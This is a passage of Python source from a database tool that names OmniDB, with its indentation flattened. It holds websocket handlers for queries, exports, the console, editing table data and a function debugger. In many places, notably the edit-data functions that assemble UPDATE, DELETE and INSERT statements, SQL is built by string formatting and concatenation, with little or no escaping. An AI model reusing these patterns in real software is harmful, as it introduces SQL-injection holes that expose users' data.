except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
def thread_advancedobjectsearch(self, p_key1, p_key2, p_sql, p_args, p_ws_object):
try:
v_session = p_ws_object.v_session
#This thread pool was canceled by the user, so do nothing
if self.cancel:
return
v_database = OmniDatabase.Generic.InstantiateDatabase(
p_args['v_database'].v_db_type,
p_args['v_database'].v_connection.v_host,
p_args['v_database'].v_connection.v_port,
p_args['v_database'].v_active_service,
p_args['v_database'].v_active_user,
p_args['v_database'].v_connection.v_password,
p_args['v_database'].v_conn_id,
p_args['v_database'].v_alias,
p_conn_string = p_args['v_database'].v_conn_string,
p_parse_conn_string = False
)
v_database.v_connection.Open()
try:
self.tag['lock'].acquire()
self.tag['activeConnections'].append(v_database.v_connection)
finally:
self.tag['lock'].release()
v_sql = re.sub(r'--#FILTER_PATTERN_CASE_SENSITIVE#.*\n', '', p_sql)
v_sql = re.sub(r'--#FILTER_PATTERN_CASE_INSENSITIVE#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_PATTERN_REGEX_CASE_SENSITIVE#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_PATTERN_REGEX_CASE_INSENSITIVE#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_DATA_CATEGORY_FILTER#.*\n', '', v_sql)
v_sql = re.sub(r'--#FILTER_BY_SCHEMA#.*\n', '', v_sql)
v_result = {
'count': v_database.v_connection.ExecuteScalar('''
select count(x.*)
from (
{0}
) x
'''.format(p_sql)
),
'sql': sqlparse.format(v_sql, reindent=True),
'exception': None
}
v_database.v_connection.Close()
try:
self.tag['lock'].acquire()
self.tag['activeConnections'].remove(v_database.v_connection)
if p_key1 is not None:
if p_key2 is not None: #Data category on
if p_key1 not in self.tag['result']: #If data not in result
self.tag['result'][p_key1] = {
'count': 0,
'result': {},
'exception': None
}
self.tag['result'][p_key1]['count'] += v_result['count']
self.tag['result'][p_key1]['result'][p_key2] = v_result
else:
self.tag['result'][p_key1] = v_result
finally:
self.tag['lock'].release()
except Exception as exc:
#logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_result = {
'count': 0,
'sql': '',
'exception': traceback.format_exc().replace('\n', '<br />')
}
try:
self.tag['lock'].acquire()
if v_database is not None and v_database.v_connection is not None and v_database.v_connection in self.tag['activeConnections']:
v_database.v_connection.Close()
self.tag['activeConnections'].remove(v_database.v_connection)
if p_key1 is not None:
if p_key2 is not None: #Data category on
if p_key1 not in self.tag['result']: #If data not in result
self.tag['result'][p_key1] = {
'count': 0,
'result': {},
'exception': ''
}
self.tag['result'][p_key1]['count'] += v_result['count']
self.tag['result'][p_key1]['exception'] += '<br />{0}'.format(v_result['exception'])
self.tag['result'][p_key1]['result'][p_key2] = v_result
else:
self.tag['result'][p_key1] = v_result
finally:
self.tag['lock'].release()
def thread_query(self,args,ws_object):
v_response = {
'v_code': response.QueryResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
try:
v_database_index = args['v_db_index']
v_sql = args['v_sql_cmd']
v_cmd_type = args['v_cmd_type']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_mode = args['v_mode']
v_all_data = args['v_all_data']
v_log_query = args['v_log_query']
v_tab_title = args['v_tab_title']
v_autocommit = args['v_autocommit']
#Removing last character if it is a semi-colon
if v_sql[-1:]==';':
v_sql = v_sql[:-1]
v_session = ws_object.v_session
v_database = args['v_database']
v_omnidb_database = OmniDatabase.Generic.InstantiateDatabase(
'sqlite',
'',
'',
settings.OMNIDB_DATABASE,
'',
'',
'0',
''
)
log_start_time = datetime.now()
log_status = 'success'
v_inserted_id = None
try:
#insert new tab record
if not v_tab_object['tab_db_id'] and not v_tab_object['inserted_tab'] and v_log_query:
try:
v_omnidb_database.v_connection.Open()
v_omnidb_database.v_connection.Execute('''
insert into tabs (conn_id,user_id,tab_id,snippet,title)
values
({0},{1},(select coalesce(max(tab_id), 0) + 1 from tabs),'{2}','{3}')
'''.format(ws_object.v_session.v_databases[v_tab_object['database_index']]['database'].v_conn_id, ws_object.v_session.v_user_id, v_tab_object['sql_save'].replace("'","''"),v_tab_title.replace("'","''")))
v_inserted_id = v_omnidb_database.v_connection.ExecuteScalar('''
select coalesce(max(tab_id), 0) from tabs
''')
v_omnidb_database.v_connection.Close()
v_tab_object['inserted_tab'] = True
v_inserted_tab = True
except Exception as exc:
None
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
if v_cmd_type=='export_csv' or v_cmd_type=='export_xlsx':
#cleaning temp folder
clean_temp_folder()
if v_cmd_type=='export_csv':
v_extension = 'csv'
else:
v_extension = 'xlsx'
v_export_dir = settings.TEMP_DIR
if not os.path.exists(v_export_dir):
os.makedirs(v_export_dir)
v_database.v_connection.Open()
v_file_name = '{0}.{1}'.format(str(time.time()).replace('.','_'),v_extension)
v_data1 = v_database.v_connection.QueryBlock(v_sql, 1000, False, True)
#if platform.system() == 'Windows':
# f = Spartacus.Utils.DataFileWriter(os.path.join(v_export_dir, v_file_name), v_data1.Columns, 'windows-1252')
#else:
# f = Spartacus.Utils.DataFileWriter(os.path.join(v_export_dir, v_file_name), v_data1.Columns)
f = Spartacus.Utils.DataFileWriter(os.path.join(v_export_dir, v_file_name), v_data1.Columns,v_session.v_csv_encoding, v_session.v_csv_delimiter)
f.Open()
if v_database.v_connection.v_start:
f.Write(v_data1)
v_hasmorerecords = False
elif len(v_data1.Rows) > 0:
f.Write(v_data1)
v_hasmorerecords = True
else:
v_hasmorerecords = False
while v_hasmorerecords:
v_data1 = v_database.v_connection.QueryBlock(v_sql, 1000, False, True)
if v_database.v_connection.v_start:
f.Write(v_data1)
v_hasmorerecords = False
elif len(v_data1.Rows) > 0:
f.Write(v_data1)
v_hasmorerecords = True
else:
v_hasmorerecords = False
v_database.v_connection.Close()
f.Flush()
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_filename': settings.PATH + '/static/temp/{0}'.format(v_file_name),
'v_downloadname': 'omnidb_exported.{0}'.format(v_extension),
'v_duration': v_duration,
'v_inserted_id': v_inserted_id,
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': False
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
if v_mode==0:
v_database.v_connection.v_autocommit = v_autocommit
if not v_database.v_connection.v_con or v_database.v_connection.GetConStatus() == 0:
v_database.v_connection.Open()
else:
v_database.v_connection.v_start=True
if (v_mode==0 or v_mode==1) and not v_all_data:
v_data1 = v_database.v_connection.QueryBlock(v_sql, 50, True, True)
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
v_notices_length = len(v_notices)
if v_notices_length > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
v_database.v_connection.ClearNotices()
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_col_names' : v_data1.Columns,
'v_data' : v_data1.Rows,
'v_last_block': True,
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': v_notices_length,
'v_inserted_id': v_inserted_id,
'v_status': v_database.v_connection.GetStatus(),
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': True
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#if len(v_data1.Rows) < 50 and v_autocommit:
# try:
# v_database.v_connection.Close()
# except:
# pass
elif v_mode==2 or v_all_data:
v_hasmorerecords = True
k = 0
while v_hasmorerecords:
k = k + 1
v_data1 = v_database.v_connection.QueryBlock(v_sql, 10000, True, True)
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
v_notices_length = len(v_notices)
if v_notices_length > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
v_database.v_connection.ClearNotices()
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_col_names' : v_data1.Columns,
'v_data' : v_data1.Rows,
'v_last_block': False,
#'v_query_info' : "Number of records: {0}".format(len(v_data1.Rows)),
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': v_notices_length,
'v_inserted_id': v_inserted_id,
'v_status': '',
'v_con_status': 0,
'v_chunks': True
}
if v_database.v_connection.v_start:
v_hasmorerecords = False
elif len(v_data1.Rows) > 0:
v_hasmorerecords = True
else:
v_hasmorerecords = False
if self.cancel:
break
elif v_hasmorerecords:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
if not self.cancel:
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_col_names' : v_data1.Columns,
'v_data' : v_data1.Rows,
'v_last_block': True,
#'v_query_info' : "Number of records: {0}".format(len(v_data1.Rows)),
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': len(v_notices),
'v_inserted_id': v_inserted_id,
'v_status': v_database.v_connection.GetStatus(),
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': True
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
elif v_mode==3 or v_mode==4:
v_duration = GetDuration(log_start_time,log_end_time)
#commit
if v_mode==3:
v_database.v_connection.Query('COMMIT;',True)
else:
v_database.v_connection.Query('ROLLBACK;',True)
v_response['v_data'] = {
'v_col_names' : None,
'v_data' : [],
'v_last_block': True,
#'v_query_info' : "",
'v_duration': v_duration,
'v_notices': "",
'v_notices_length': 0,
'v_inserted_id': v_inserted_id,
'v_status': v_database.v_connection.GetStatus(),
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': False
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
if not self.cancel:
try:
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
except:
v_notices = []
v_notices_text = ''
#try:
# v_database.v_connection.Close()
#except:
# pass
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
log_status = 'error'
v_response['v_data'] = {
'position': v_database.GetErrorPosition(str(exc)),
'message' : str(exc).replace('\n','<br>'),
'v_duration': v_duration,
'v_notices': v_notices_text,
'v_notices_length': len(v_notices),
'v_inserted_id': v_inserted_id,
'v_status': 0,
'v_con_status': v_database.v_connection.GetConStatus(),
'v_chunks': False
}
v_response['v_error'] = True
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Log to history
if v_mode==0 and v_log_query:
LogHistory(v_omnidb_database,
v_session.v_user_id,
v_session.v_user_name,
v_sql,
log_start_time,
log_end_time,
v_duration,
log_status,
ws_object.v_session.v_databases[v_tab_object['database_index']]['database'].v_conn_id)
#if mode=0 save tab
if v_mode==0 and v_tab_object['tab_db_id'] and v_log_query:
try:
v_omnidb_database.v_connection.Execute('''
update tabs
set conn_id = {0},
snippet = '{1}',
title = '{2}'
where tab_id = {3}
'''.format(ws_object.v_session.v_databases[v_tab_object['database_index']]['database'].v_conn_id, v_tab_object['sql_save'].replace("'","''"),v_tab_title.replace("'","''"), v_tab_object['tab_db_id']))
except Exception as exc:
None
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_error'] = True
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_console(self,args,ws_object):
v_response = {
'v_code': response.ConsoleResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
try:
v_database_index = args['v_db_index']
v_sql = args['v_sql_cmd']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_autocommit = args['v_autocommit']
v_mode = args['v_mode']
#Removing last character if it is a semi-colon
if v_sql[-1:]==';':
v_sql = v_sql[:-1]
v_session = ws_object.v_session
v_database = args['v_database']
v_omnidb_database = OmniDatabase.Generic.InstantiateDatabase(
'sqlite',
'',
'',
settings.OMNIDB_DATABASE,
'',
'',
'0',
''
)
log_start_time = datetime.now()
log_status = 'success'
try:
list_sql = sqlparse.split(v_sql)
v_data_return = ''
run_command_list = True
if v_mode==0:
v_database.v_connection.v_autocommit = v_autocommit
if not v_database.v_connection.v_con or v_database.v_connection.GetConStatus() == 0:
v_database.v_connection.Open()
else:
v_database.v_connection.v_start=True
if v_mode == 1 or v_mode ==2:
v_table = v_database.v_connection.QueryBlock('', 50, True, True)
                #there is still data to fetch, so stop here again and show the fetch button
if not v_database.v_connection.v_start or len(v_table.Rows)>=50:
v_data_return += '\n' + v_table.Pretty(v_database.v_connection.v_expanded) + '\n' + v_database.v_connection.GetStatus()
run_command_list = False
v_show_fetch_button = True
else:
v_data_return += '\n' + v_table.Pretty(v_database.v_connection.v_expanded) + '\n' + v_database.v_connection.GetStatus()
run_command_list = True
list_sql = v_tab_object['remaining_commands']
if v_mode == 3:
run_command_list = True
list_sql = v_tab_object['remaining_commands']
if run_command_list:
counter = 0
v_show_fetch_button = False
for sql in list_sql:
counter = counter + 1
try:
                        formatted_sql = sql.strip()
                        v_data_return += '\n>> ' + formatted_sql + '\n'
v_database.v_connection.ClearNotices()
v_database.v_connection.v_start=True
v_data1 = v_database.v_connection.Special(sql);
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice
v_data_return += v_notices_text
v_data_return += v_data1
if v_database.v_use_server_cursor:
if v_database.v_connection.v_last_fetched_size == 50:
v_tab_object['remaining_commands'] = list_sql[counter:]
v_show_fetch_button = True
break
except Exception as exc:
try:
v_notices = v_database.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice
v_data_return += v_notices_text
except Exception as exc:
None
v_data_return += str(exc)
v_tab_object['remaining_commands'] = []
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_data' : v_data_return,
'v_last_block': True,
'v_duration': v_duration
}
#send data in chunks to avoid blocking the websocket server
chunks = [v_data_return[x:x+10000] for x in range(0, len(v_data_return), 10000)]
if len(chunks)>0:
for count in range(0,len(chunks)):
if self.cancel:
break
if not count==len(chunks)-1:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': False,
'v_duration': v_duration,
'v_show_fetch_button': v_show_fetch_button,
'v_con_status': '',
}
else:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': True,
'v_duration': v_duration,
'v_show_fetch_button': v_show_fetch_button,
'v_con_status': v_database.v_connection.GetConStatus(),
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
try:
v_database.v_connection.ClearNotices()
except Exception:
None
except Exception as exc:
#try:
# v_database.v_connection.Close()
#except:
# pass
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
log_status = 'error'
v_response['v_data'] = {
'v_data': str(exc),
'v_duration': v_duration
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
if v_mode == 0:
#logging to console history
v_omnidb_database.v_connection.Open()
v_omnidb_database.v_connection.Execute('BEGIN TRANSACTION')
v_omnidb_database.v_connection.Execute('''
insert into console_history values (
{0},
{1},
'{2}',
DATETIME('now'))
'''.format(v_session.v_user_id,
v_database.v_conn_id,
v_sql.replace("'","''")))
#keep 100 rows in console history table for current user/connection
v_omnidb_database.v_connection.Execute('''
delete
from console_history
where command_date not in (
select command_date
from console_history
where user_id = {0}
and conn_id = {1}
order by command_date desc
limit 100
)
and user_id = {0}
and conn_id = {1}
'''.format(v_session.v_user_id,
v_database.v_conn_id,
v_sql.replace("'","''")))
#Log to history
LogHistory(v_omnidb_database,
v_session.v_user_id,
v_session.v_user_name,
v_sql,
log_start_time,
log_end_time,
v_duration,
log_status,
v_database.v_conn_id)
v_omnidb_database.v_connection.Close()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_data'] = {
'v_data': str(exc),
'v_duration': ''
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_terminal(self,args,ws_object):
v_response = {
'v_code': response.TerminalResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
try:
v_cmd = args['v_cmd']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_terminal_object = v_tab_object['terminal_object']
while not self.cancel:
try:
if v_tab_object['terminal_type'] == 'local':
v_data_return = v_terminal_object.read_nonblocking(size=1024)
else:
v_data_return = v_terminal_object.read_current()
v_response['v_data'] = {
'v_data' : v_data_return,
'v_last_block': True
}
#send data in chunks to avoid blocking the websocket server
chunks = [v_data_return[x:x+10000] for x in range(0, len(v_data_return), 10000)]
if len(chunks)>0:
for count in range(0,len(chunks)):
if self.cancel:
break
if not count==len(chunks)-1:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': False
}
else:
v_response['v_data'] = {
'v_data' : chunks[count],
'v_last_block': True
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
if 'EOF' in str(exc):
break
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_data'] = {
'v_data': str(exc),
'v_duration': ''
}
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_query_edit_data(self,args,ws_object):
v_response = {
'v_code': response.QueryEditDataResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': {
'v_data' : [],
'v_row_pk' : [],
'v_query_info' : ''
}
}
try:
v_database_index = args['v_db_index']
v_table = args['v_table']
v_schema = args['v_schema']
v_filter = args['v_filter']
v_count = args['v_count']
v_pk_list = args['v_pk_list']
v_columns = args['v_columns']
v_tab_id = args['v_tab_id']
v_session = ws_object.v_session
v_database = args['v_database']
try:
if v_database.v_has_schema:
v_table_name = v_schema + '.' + v_table
else:
v_table_name = v_table
v_column_list = ''
v_first = True
for v_column in v_columns:
if not v_first:
v_column_list = v_column_list + ','
v_first = False
v_column_list = v_column_list + v_column['v_readformat'].replace('#', v_column['v_column'])
v_data1 = v_database.QueryTableRecords(v_column_list, v_table_name, v_filter, v_count)
v_response['v_data']['v_query_info'] = 'Number of records: ' + str(len(v_data1.Rows))
for v_row in v_data1.Rows:
v_row_data = []
v_row_pk = []
for j in range(0, len(v_pk_list)):
v_pk_col = {}
v_pk_col['v_column'] = v_pk_list[j]['v_column']
v_pk_col['v_value'] = v_row[v_pk_list[j]['v_column'].replace('"','')]
v_row_pk.append(v_pk_col)
v_response['v_data']['v_row_pk'].append(v_row_pk)
v_row_data.append('')
for v_col in v_data1.Columns:
v_row_data.append(str(v_row[v_col]))
v_response['v_data']['v_data'].append(v_row_data)
except Exception as exc:
v_response['v_data'] = str(exc)
v_response['v_error'] = True
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_error'] = True
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_save_edit_data(self,args,ws_object):
v_response = {
'v_code': response.SaveEditDataResult,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': []
}
try:
v_database_index = args['v_db_index']
v_table = args['v_table']
v_schema = args['v_schema']
v_data_rows = args['v_data_rows']
v_rows_info = args['v_rows_info']
v_pk_info = args['v_pk_info']
v_columns = args['v_columns']
v_tab_id = args['v_tab_id']
v_session = ws_object.v_session
v_database = args['v_database']
if v_database.v_has_schema:
v_table_name = v_schema + '.' + v_table
else:
v_table_name = v_table
i = 0
for v_row_info in v_rows_info:
if (self.cancel):
return
v_command = ''
# Deleting row
if v_row_info['mode'] == -1:
v_command = 'delete from ' + v_table_name + ' where '
v_first = True
v_pk_index = 0
for v_pk in v_row_info['pk']:
if not v_first:
v_command = v_command + ' and '
v_first = False
for j in range(0, len(v_pk_info)):
if v_pk['v_column'] == v_pk_info[j]['v_column']:
v_pk_index = j
break
if v_pk_info[v_pk_index]['v_class'] == 'numeric':
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', str(v_pk['v_column'])) + ' = ' + v_pk_info[v_pk_index]['v_compareformat'].replace('#', str(v_pk['v_value']))
else:
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', str(v_pk['v_column'])) + ' = ' + v_pk_info[v_pk_index]['v_compareformat'].replace('#', "'" + str(v_pk['v_value']) + "'")
v_row_info_return = {}
v_row_info_return['mode'] = -1
v_row_info_return['index'] = v_row_info['index']
v_row_info_return['command'] = v_command
try:
v_database.v_connection.Execute(v_command)
v_row_info_return['error'] = False
v_row_info_return['v_message'] = 'Success.'
except Exception as exc:
v_row_info_return['error'] = True
v_row_info_return['v_message'] = str(exc)
v_response['v_data'].append(v_row_info_return)
# Inserting new row
elif v_row_info['mode'] == 2:
v_command = 'insert into ' + v_table_name + ' ( '
v_first = True
for v_col in v_columns:
if not v_first:
v_command = v_command + ', '
v_first = False
v_command = v_command + v_col['v_column']
v_command = v_command + ' ) values ( '
v_first = True
for j in range(1, len(v_data_rows[i])):
if not v_first:
v_command = v_command + ', '
v_first = False
v_value = ''
if v_data_rows[i][j] != None:
v_value = v_data_rows[i][j]
if v_columns[j-1]['v_class'] == 'numeric' or v_columns[j-1]['v_class'] == 'other':
if v_value == '':
v_command = v_command + 'null'
else:
v_command = v_command + v_columns[j-1]['v_writeformat'].replace('#', v_value.replace("'", "''"))
else:
v_command = v_command + v_columns[j-1]['v_writeformat'].replace('#', v_value.replace("'", "''"))
v_command = v_command + ' )'
v_row_info_return = {}
v_row_info_return['mode'] = 2
v_row_info_return['index'] = v_row_info['index']
v_row_info_return['command'] = v_command
try:
v_database.v_connection.Execute(v_command)
v_row_info_return['error'] = False
v_row_info_return['v_message'] = 'Success.'
except Exception as exc:
v_row_info_return['error'] = True
v_row_info_return['v_message'] = str(exc)
v_response['v_data'].append(v_row_info_return)
# Updating existing row
elif v_row_info['mode'] == 1:
v_command = 'update ' + v_table_name + ' set '
v_first = True
for v_col_index in v_rows_info[i]['changed_cols']:
if not v_first:
v_command = v_command + ', '
v_first = False
v_value = ''
if v_data_rows[i][v_col_index+1] != None:
v_value = v_data_rows[i][v_col_index+1]
v_command = v_command + v_columns[v_col_index]['v_column'] + ' = '
if v_columns[v_col_index]['v_class'] == 'numeric' or v_columns[v_col_index]['v_class'] == 'other':
if v_value == '':
v_command = v_command + 'null'
else:
v_command = v_command + v_columns[v_col_index]['v_writeformat'].replace('#', v_value)
else:
v_command = v_command + v_columns[v_col_index]['v_writeformat'].replace('#', v_value.replace("'", "''"))
v_command = v_command + ' where '
v_first = True
v_pk_index = 0
for v_pk in v_row_info['pk']:
if not v_first:
v_command = v_command + ' and '
v_first = False
for j in range(0, len(v_pk_info)):
if v_pk['v_column'] == v_pk_info[j]['v_column']:
v_pk_index = j
break
if v_pk_info[v_pk_index]['v_class'] == 'numeric':
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', v_pk['v_column'] + ' = ' + str(v_pk['v_value']))
else:
v_command = v_command + v_pk_info[v_pk_index]['v_compareformat'].replace('#', v_pk['v_column'] + " = '" + str(v_pk['v_value']) + "'")
v_row_info_return = {}
v_row_info_return['mode'] = 1
v_row_info_return['index'] = v_row_info['index']
v_row_info_return['command'] = v_command
try:
v_database.v_connection.Execute(v_command)
v_row_info_return['error'] = False
v_row_info_return['v_message'] = 'Success.'
except Exception as exc:
v_row_info_return['error'] = True
v_row_info_return['v_message'] = str(exc)
v_response['v_data'].append(v_row_info_return)
i = i + 1
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_error'] = True
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
if not self.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_debug_run_func(self,args,ws_object):
v_response = {
'v_code': -1,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
v_tab_object = args['v_tab_object']
v_database_debug = v_tab_object['omnidatabase_debug']
v_database_control = v_tab_object['omnidatabase_control']
try:
#enable debugger for current connection
v_conn_string = "host=localhost port={0} dbname=''{1}'' user=''{2}''".format(args['v_port'],v_database_debug.v_service,v_database_debug.v_user);
v_database_debug.v_connection.Execute("select omnidb.omnidb_enable_debugger('{0}')".format(v_conn_string))
#run the function; this call blocks until the function ends
if args['v_type'] == 'f':
v_func_return = v_database_debug.v_connection.Query('select * from {0} limit 1000'.format(args['v_function']),True)
else:
v_func_return = v_database_debug.v_connection.Query('call {0}'.format(args['v_function']),True)
#Not cancelled, return all data
if not v_tab_object['cancelled']:
#retrieve variables
v_variables = v_database_debug.v_connection.Query('select name,attribute,vartype,value from omnidb.variables where pid = {0}'.format(v_tab_object['debug_pid']),True)
#retrieve statistics
v_statistics = v_database_debug.v_connection.Query('select lineno,coalesce(trunc((extract("epoch" from tend) - extract("epoch" from tstart))::numeric,4),0) as msec from omnidb.statistics where pid = {0} order by step'.format(v_tab_object['debug_pid']),True)
#retrieve statistics summary
v_statistics_summary = v_database_debug.v_connection.Query('''
select lineno, max(msec) as msec
from (select lineno,coalesce(trunc((extract("epoch" from tend) - extract("epoch" from tstart))::numeric,4),0) as msec from omnidb.statistics where pid = {0}) t
group by lineno
order by lineno
'''.format(v_tab_object['debug_pid']),True)
#retrieve notices
v_notices = v_database_debug.v_connection.GetNotices()
v_notices_text = ''
if len(v_notices) > 0:
for v_notice in v_notices:
v_notices_text += v_notice.replace('\n','<br/>')
v_response['v_data'] = {
'v_state': debugState.Finished,
'v_remove_context': True,
'v_result_rows': v_func_return.Rows,
'v_result_columns': v_func_return.Columns,
'v_result_statistics': v_statistics.Rows,
'v_result_statistics_summary': v_statistics_summary.Rows,
'v_result_notices': v_notices_text,
'v_result_notices_length': len(v_notices),
'v_variables': v_variables.Rows,
'v_error': False
}
v_database_debug.v_connection.Close()
#send debugger finished message
v_response['v_code'] = response.DebugResponse
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Cancelled, return cancelled status
else:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Cancel,
'v_remove_context': True,
'v_error': False
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
#Not cancelled
if not v_tab_object['cancelled']:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Finished,
'v_remove_context': True,
'v_error': True,
'v_error_msg': str(exc)
}
try:
v_database_debug.v_connection.Close()
except Exception:
None
try:
v_database_control.v_connection.Close()
except Exception:
None
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Cancel,
'v_remove_context': True,
'v_error': False
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_debug(self,args,ws_object):
v_response = {
'v_code': -1,
'v_context_code': args['v_context_code'],
'v_error': False,
'v_data': 1
}
v_state = args['v_state']
v_tab_id = args['v_tab_id']
v_tab_object = args['v_tab_object']
v_database_debug = v_tab_object['omnidatabase_debug']
v_database_control = v_tab_object['omnidatabase_control']
try:
if v_state == debugState.Starting:
#Start debugger and return ready state
v_database_debug.v_connection.Open()
v_database_control.v_connection.Open()
#Cleaning contexts table
v_database_debug.v_connection.Execute('delete from omnidb.contexts t where t.pid not in (select pid from pg_stat_activity where pid = t.pid)')
connections_details = v_database_debug.v_connection.Query('select pg_backend_pid()',True)
pid = connections_details.Rows[0][0]
v_database_debug.v_connection.Execute('insert into omnidb.contexts (pid, function, hook, lineno, stmttype, breakpoint, finished) values ({0}, null, null, null, null, 0, false)'.format(pid))
#lock row for current pid
v_database_control.v_connection.Execute('select pg_advisory_lock({0}) from omnidb.contexts where pid = {0}'.format(pid))
#updating pid and port in tab object
v_tab_object['debug_pid'] = pid
#Run thread that will execute the function
t = StoppableThread(thread_debug_run_func,{ 'v_tab_object': v_tab_object, 'v_context_code': args['v_context_code'], 'v_function': args['v_function'], 'v_type': args['v_type'], 'v_port': args['v_port']},ws_object)
v_tab_object['thread'] = t
#t.setDaemon(True)
t.start()
ws_object.v_list_tab_objects[v_tab_id] = v_tab_object
v_lineno = None
#wait for context to be ready or thread ends
while v_lineno is None and t.is_alive():
time.sleep(0.5)
v_lineno = v_database_control.v_connection.ExecuteScalar('select lineno from omnidb.contexts where pid = {0} and lineno is not null'.format(pid))
# Function ended instantly
if not t.is_alive():
v_database_control.v_connection.Close()
else:
v_variables = v_database_control.v_connection.Query('select name,attribute,vartype,value from omnidb.variables where pid = {0}'.format(pid),True)
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Ready,
'v_remove_context': False,
'v_variables': v_variables.Rows,
